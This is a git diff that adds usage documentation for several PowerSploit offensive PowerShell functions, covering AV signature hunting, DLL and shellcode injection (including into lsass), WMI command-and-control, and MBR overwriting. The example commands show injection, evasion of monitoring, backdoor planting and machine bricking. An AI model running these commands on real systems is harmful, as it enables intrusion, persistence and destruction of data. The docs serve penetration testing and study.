diff options
Diffstat (limited to 'docs')
129 files changed, 21822 insertions, 0 deletions
diff --git a/docs/AntivirusBypass/Find-AVSignature.md b/docs/AntivirusBypass/Find-AVSignature.md new file mode 100755 index 0000000..1606154 --- /dev/null +++ b/docs/AntivirusBypass/Find-AVSignature.md @@ -0,0 +1,158 @@ +# Find-AVSignature
+
+## SYNOPSIS
+Locate tiny AV signatures.
+
+PowerSploit Function: Find-AVSignature
+Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Find-AVSignature [-StartByte] <UInt32> [-EndByte] <String> [-Interval] <UInt32> [[-Path] <String>]
+ [[-OutPath] <String>] [[-BufferLen] <UInt32>] [-Force]
+```
+
+## DESCRIPTION
+Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe
+```
+
+Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose
+Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose
+Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose
+Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose
+
+## PARAMETERS
+
+### -StartByte
+Specifies the first byte to begin splitting on.
+
+```yaml
+Type: UInt32
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -EndByte
+Specifies the last byte to split on.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Interval
+Specifies the interval size to split with.
+
+```yaml
+Type: UInt32
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 3
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the path to the binary you want tested.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: ($pwd.path)
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OutPath
+Optionally specifies the directory to write the binaries to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: ($pwd)
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -BufferLen
+Specifies the length of the file read buffer .
+Defaults to 64KB.
+
+```yaml
+Type: UInt32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: 65536
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Force
+Forces the script to continue without confirmation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+Several of the versions of "DSplit.exe" available on the internet contain malware.
+
+## RELATED LINKS
+
+[http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
+https://github.com/mattifestation/PowerSploit
+http://www.exploit-monday.com/
+http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2](http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
+https://github.com/mattifestation/PowerSploit
+http://www.exploit-monday.com/
+http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2)
+
diff --git a/docs/CodeExecution/Invoke-DllInjection.md b/docs/CodeExecution/Invoke-DllInjection.md new file mode 100755 index 0000000..d41bf31 --- /dev/null +++ b/docs/CodeExecution/Invoke-DllInjection.md @@ -0,0 +1,79 @@ +# Invoke-DllInjection
+
+## SYNOPSIS
+Injects a Dll into the process ID of your choosing.
+
+PowerSploit Function: Invoke-DllInjection
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Invoke-DllInjection [-ProcessID] <Int32> [-Dll] <String>
+```
+
+## DESCRIPTION
+Invoke-DllInjection injects a Dll into an arbitrary process.
+It does this by using VirtualAllocEx to allocate memory the size of the
+DLL in the remote process, writing the names of the DLL to load into the
+remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread
+to invoke LoadLibraryA in the context of the remote process.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-DllInjection -ProcessID 4274 -Dll evil.dll
+```
+
+Description
+-----------
+Inject 'evil.dll' into process ID 4274.
+
+## PARAMETERS
+
+### -ProcessID
+Process ID of the process you want to inject a Dll into.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Dll
+Name of the dll to inject.
+This can be an absolute or relative path.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+Use the '-Verbose' option to print detailed information.
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+
diff --git a/docs/CodeExecution/Invoke-ReflectivePEInjection.md b/docs/CodeExecution/Invoke-ReflectivePEInjection.md new file mode 100755 index 0000000..aee653d --- /dev/null +++ b/docs/CodeExecution/Invoke-ReflectivePEInjection.md @@ -0,0 +1,300 @@ +# Invoke-ReflectivePEInjection
+
+## SYNOPSIS
+This script has two modes.
+It can reflectively load a DLL/EXE in to the PowerShell process,
+or it can reflectively load a DLL in to a remote process.
+These modes have different parameters and constraints,
+please lead the Notes section (GENERAL NOTES) for information on how to use them.
+
+1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.
+Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process.
+
+This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system,
+this will load and execute the DLL/EXE in to memory without writing any files to disk.
+
+2.) Reflectively load a DLL in to memory of a remote process.
+As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process.
+
+This is probably most useful for injecting backdoors in SYSTEM processes in Session0.
+Currently, you cannot retrieve output
+from the DLL.
+The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the
+remote process.
+
+PowerSploit Function: Invoke-ReflectivePEInjection
+Author: Joe Bialek, Twitter: @JosephBialek
+Code review and modifications: Matt Graeber, Twitter: @mattifestation
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Invoke-ReflectivePEInjection [-PEBytes] <Byte[]> [[-ComputerName] <String[]>] [[-FuncReturnType] <String>]
+ [[-ExeArgs] <String>] [[-ProcId] <Int32>] [[-ProcName] <String>] [-ForceASLR] [-DoNotZeroMZ]
+```
+
+## DESCRIPTION
+Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc().
+```
+
+$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL.dll')
+Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print
+```
+
+the wchar_t* returned by WStringFunc() from all the computers.
+$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL.dll')
+Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Load DemoEXE and run it locally.
+```
+
+$PEBytes = \[IO.File\]::ReadAllBytes('DemoEXE.exe')
+Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Load DemoEXE and run it locally. Forces ASLR on for the EXE.
+```
+
+$PEBytes = \[IO.File\]::ReadAllBytes('DemoEXE.exe')
+Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.
+```
+
+$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL_RemoteProcess.dll')
+Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local
+
+## PARAMETERS
+
+### -PEBytes
+A byte array containing a DLL/EXE to load and execute.
+
+```yaml
+Type: Byte[]
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerName
+Optional, an array of computernames to run the script on.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FuncReturnType
+Optional, the return type of the function being called in the DLL.
+Default: Void
+ Options: String, WString, Void.
+See notes for more information.
+ IMPORTANT: For DLLs being loaded remotely, only Void is supported.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: Void
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExeArgs
+Optional, arguments to pass to the executable being reflectively loaded.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ProcId
+Optional, the process ID of the remote process to inject the DLL in to.
+If not injecting in to remote process, ignore this.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ProcName
+Optional, the name of the remote process to inject the DLL in to.
+If not injecting in to remote process, ignore this.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ForceASLR
+Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR.
+Some PE's will work with ASLR even
+ if the compiler flags don't indicate they support it.
+Other PE's will simply crash.
+Make sure to test this prior to using.
+Has no effect when
+ loading in to a remote process.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DoNotZeroMZ
+Optional, will not wipe the MZ from the first two bytes of the PE.
+This is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+GENERAL NOTES:
+The script has 3 basic sets of functionality:
+1.) Reflectively load a DLL in to the PowerShell process
+ -Can return DLL output to user when run remotely or locally.
+ -Cleans up memory in the PS process once the DLL finishes executing.
+ -Great for running pentest tools on remote computers without triggering process monitoring alerts.
+ -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info.
+2.) Reflectively load an EXE in to the PowerShell process.
+ -Can NOT return EXE output to user when run remotely.
+If remote output is needed, you must use a DLL.
+CAN return EXE output if run locally.
+ -Cleans up memory in the PS process once the DLL finishes executing.
+ -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts.
+3.) Reflectively inject a DLL in to a remote process.
+ -Can NOT return DLL output to the user when run remotely OR locally.
+ -Does NOT clean up memory in the remote process if/when DLL finishes execution.
+ -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory.
+ -Expects the DLL to have this function: void VoidFunc().
+This is the function that will be called after the DLL is loaded.
+
+DLL LOADING NOTES:
+
+PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output.
+If you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL
+return a char* or wchar_t*, which PowerShell can take and read the output from.
+Anything output from stdout which is run using powershell
+remoting will not be returned to you.
+If you just run the PowerShell script locally, you WILL be able to see the stdout output from
+applications because it will just appear in the console window.
+The limitation only applies when using PowerShell remoting.
+
+For DLL Loading:
+Once this script loads the DLL, it calls a function in the DLL.
+There is a section near the bottom labeled "YOUR CODE GOES HERE"
+I recommend your DLL take no parameters.
+I have prewritten code to handle functions which take no parameters are return
+the following types: char*, wchar_t*, and void.
+If the function returns char* or wchar_t* the script will output the
+returned data.
+The FuncReturnType parameter can be used to specify which return type to use.
+The mapping is as follows:
+wchar_t* : FuncReturnType = WString
+char* : FuncReturnType = String
+void : Default, don't supply a FuncReturnType
+
+For the whcar_t* and char_t* options to work, you must allocate the string to the heap.
+Don't simply convert a string
+using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns.
+
+The function name expected in the DLL for the prewritten FuncReturnType's is as follows:
+WString : WStringFunc
+String : StringFunc
+Void : VoidFunc
+
+These function names ARE case sensitive.
+To create an exported DLL function for the wstring type, the function would
+be declared as follows:
+extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
+
+
+If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify
+this script to accomodate this.
+You can find the code to modify in the section labeled "YOUR CODE GOES HERE".
+
+Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection
+
+## RELATED LINKS
+
+[http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
+
+Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
+Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/](http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
+
+Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
+Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/)
+
diff --git a/docs/CodeExecution/Invoke-Shellcode.md b/docs/CodeExecution/Invoke-Shellcode.md new file mode 100755 index 0000000..7240a4c --- /dev/null +++ b/docs/CodeExecution/Invoke-Shellcode.md @@ -0,0 +1,116 @@ +# Invoke-Shellcode
+
+## SYNOPSIS
+Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
+
+PowerSploit Function: Invoke-Shellcode
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Invoke-Shellcode [-ProcessID <UInt16>] [-Shellcode <Byte[]>] [-Force]
+```
+
+## DESCRIPTION
+Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre
+
+PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX.
+To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):
+
+msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/\[";\]//g;s/\\\\/,0/g' | tr -d '\n' | cut -c2-
+
+Make sure to specify 'thread' for your exit process.
+Also, don't bother encoding your shellcode.
+It's entirely unnecessary.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-Shellcode -ProcessId 4274
+```
+
+Description
+-----------
+Inject shellcode into process ID 4274.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Invoke-Shellcode
+```
+
+Description
+-----------
+Inject shellcode into the running instance of PowerShell.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)
+```
+
+Description
+-----------
+Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)
+Warning: This script has no way to validate that your shellcode is 32 vs.
+64-bit!
+
+## PARAMETERS
+
+### -ProcessID
+Process ID of the process you want to inject shellcode into.
+
+```yaml
+Type: UInt16
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Shellcode
+Specifies an optional shellcode passed in as a byte array
+
+```yaml
+Type: Byte[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Force
+Injects shellcode without prompting for confirmation.
+By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/CodeExecution/Invoke-WmiCommand.md b/docs/CodeExecution/Invoke-WmiCommand.md new file mode 100755 index 0000000..23e7d9e --- /dev/null +++ b/docs/CodeExecution/Invoke-WmiCommand.md @@ -0,0 +1,311 @@ +# Invoke-WmiCommand
+
+## SYNOPSIS
+Executes a PowerShell ScriptBlock on a target computer using WMI as a
+pure C2 channel.
+
+Author: Matthew Graeber
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Invoke-WmiCommand [-Payload] <ScriptBlock> [[-RegistryHive] <String>] [[-RegistryKeyPath] <String>]
+ [[-RegistryPayloadValueName] <String>] [[-RegistryResultValueName] <String>] [[-ComputerName] <String[]>]
+ [[-Credential] <PSCredential>] [[-Impersonation] <ImpersonationLevel>]
+ [[-Authentication] <AuthenticationLevel>] [-EnableAllPrivileges] [[-Authority] <String>]
+```
+
+## DESCRIPTION
+Invoke-WmiCommand executes a PowerShell ScriptBlock on a target
+computer using WMI as a pure C2 channel.
+It does this by using the
+StdRegProv WMI registry provider methods to store a payload into a
+registry value.
+The command is then executed on the victim system and
+the output is stored in another registry value that is then retrieved
+remotely.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1'
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$Hosts = Get-Content hostnames.txt
+```
+
+PS C:\\\>$Payload = Get-Content payload.ps1
+PS C:\\\>$Credential = Get-Credential 'TargetDomain\TargetUser'
+PS C:\\\>$Hosts | Invoke-WmiCommand -Payload $Payload -Credential $Credential
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$Payload = Get-Content payload.ps1
+```
+
+PS C:\\\>Invoke-WmiCommand -Payload $Payload -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1', '10.10.1.2'
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential 'TargetHost\Administrator' -Verbose
+```
+
+## PARAMETERS
+
+### -Payload
+Specifies the payload to be executed on the remote system.
+
+```yaml
+Type: ScriptBlock
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RegistryHive
+{{Fill RegistryHive Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: HKEY_CURRENT_USER
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RegistryKeyPath
+Specifies the registry key where the payload and payload output will
+be stored.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: SOFTWARE\Microsoft\Cryptography\RNG
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RegistryPayloadValueName
+Specifies the registry value name where the payload will be stored.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: Seed
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RegistryResultValueName
+Specifies the registry value name where the payload output will be
+stored.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: Value
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerName
+Runs the command on the specified computers.
+The default is the local
+computer.
+
+Type the NetBIOS name, an IP address, or a fully qualified domain
+name of one or more computers.
+To specify the local computer, type
+the computer name, a dot (.), or "localhost".
+
+This parameter does not rely on Windows PowerShell remoting.
+You can
+use the ComputerName parameter even if your computer is not
+configured to run remote commands.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Cn
+
+Required: False
+Position: 6
+Default value: Localhost
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+Specifies a user account that has permission to perform this action.
+The default is the current user.
+Type a user name, such as "User01",
+"Domain01\User01", or User@Contoso.com.
+Or, enter a PSCredential
+object, such as an object that is returned by the Get-Credential
+cmdlet.
+When you type a user name, you will be prompted for a
+password.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 7
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Impersonation
+Specifies the impersonation level to use.
+Valid values are:
+
+0: Default (Reads the local registry for the default impersonation level, which is usually set to "3: Impersonate".)
+
+1: Anonymous (Hides the credentials of the caller.)
+
+2: Identify (Allows objects to query the credentials of the caller.)
+
+3: Impersonate (Allows objects to use the credentials of the caller.)
+
+4: Delegate (Allows objects to permit other objects to use the credentials of the caller.)
+
+```yaml
+Type: ImpersonationLevel
+Parameter Sets: (All)
+Aliases:
+Accepted values: Default, Anonymous, Identify, Impersonate, Delegate
+
+Required: False
+Position: 8
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Authentication
+Specifies the authentication level to be used with the WMI connection.
+Valid values are:
+
+-1: Unchanged
+
+0: Default
+
+1: None (No authentication in performed.)
+
+2: Connect (Authentication is performed only when the client establishes a relationship with the application.)
+
+3: Call (Authentication is performed only at the beginning of each call when the application receives the request.)
+
+4: Packet (Authentication is performed on all the data that is received from the client.)
+
+5: PacketIntegrity (All the data that is transferred between the client and the application is authenticated and verified.)
+
+6: PacketPrivacy (The properties of the other authentication levels are used, and all the data is encrypted.)
+
+```yaml
+Type: AuthenticationLevel
+Parameter Sets: (All)
+Aliases:
+Accepted values: Default, None, Connect, Call, Packet, PacketIntegrity, PacketPrivacy, Unchanged
+
+Required: False
+Position: 9
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -EnableAllPrivileges
+Enables all the privileges of the current user before the command
+makes the WMI call.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Authority
+Specifies the authority to use to authenticate the WMI connection.
+You can specify standard NTLM or Kerberos authentication.
+To use
+NTLM, set the authority setting to ntlmdomain:\<DomainName\>, where
+\<DomainName\> identifies a valid NTLM domain name.
+To use Kerberos,
+specify kerberos:\<DomainName\ServerName\>.
+You cannot include the
+authority setting when you connect to the local computer.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 10
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### System.String[]
+
+Accepts one or more host names/IP addresses over the pipeline.
+
+## OUTPUTS
+
+### System.Management.Automation.PSObject
+
+Outputs a custom object consisting of the target computer name and
+the output of the command executed.
+
+## NOTES
+In order to receive the output from your payload, it must return
+actual objects.
+For example, Write-Host doesn't return objects
+rather, it writes directly to the console.
+If you're using
+Write-Host in your scripts though, you probably don't deserve to get
+the output of your payload back.
+:P
+
+## RELATED LINKS
+
diff --git a/docs/Mayhem/Set-CriticalProcess.md b/docs/Mayhem/Set-CriticalProcess.md new file mode 100755 index 0000000..1ec952f --- /dev/null +++ b/docs/Mayhem/Set-CriticalProcess.md @@ -0,0 +1,108 @@ +# Set-CriticalProcess
+
+## SYNOPSIS
+Causes your machine to blue screen upon exiting PowerShell.
+
+PowerSploit Function: Set-CriticalProcess
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-CriticalProcess
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Set-CriticalProcess -ExitImmediately
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Set-CriticalProcess -Force -Verbose
+```
+
+## PARAMETERS
+
+### -Force
+Set the running PowerShell process as critical without asking for confirmation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExitImmediately
+Immediately exit PowerShell after successfully marking the process as critical.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -WhatIf
+Shows what would happen if the cmdlet runs.
+The cmdlet is not run.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: wi
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Confirm
+Prompts you for confirmation before running the cmdlet.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: cf
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Mayhem/Set-MasterBootRecord.md b/docs/Mayhem/Set-MasterBootRecord.md new file mode 100755 index 0000000..0aa994d --- /dev/null +++ b/docs/Mayhem/Set-MasterBootRecord.md @@ -0,0 +1,184 @@ +# Set-MasterBootRecord
+
+## SYNOPSIS
+Proof of concept code that overwrites the master boot record with the
+message of your choice.
+
+PowerSploit Function: Set-MasterBootRecord
+Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Set-MasterBootRecord [[-BootMessage] <String>] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm]
+```
+
+## DESCRIPTION
+Set-MasterBootRecord is proof of concept code designed to show that it is
+possible with PowerShell to overwrite the MBR.
+This technique was taken
+from a public malware sample.
+This script is inteded solely as proof of
+concept code.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
+```
+
+## PARAMETERS
+
+### -BootMessage
+Specifies the message that will be displayed upon making your computer a brick.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: Stop-Crying; Get-NewHardDrive
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RebootImmediately
+Reboot the machine immediately upon overwriting the MBR.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Force
+Suppress the warning prompt.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -WhatIf
+Shows what would happen if the cmdlet runs.
+The cmdlet is not run.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: wi
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Confirm
+Prompts you for confirmation before running the cmdlet.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: cf
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+Obviously, this will only work if you have a master boot record to
+overwrite.
+This won't work if you have a GPT (GUID partition table).
+
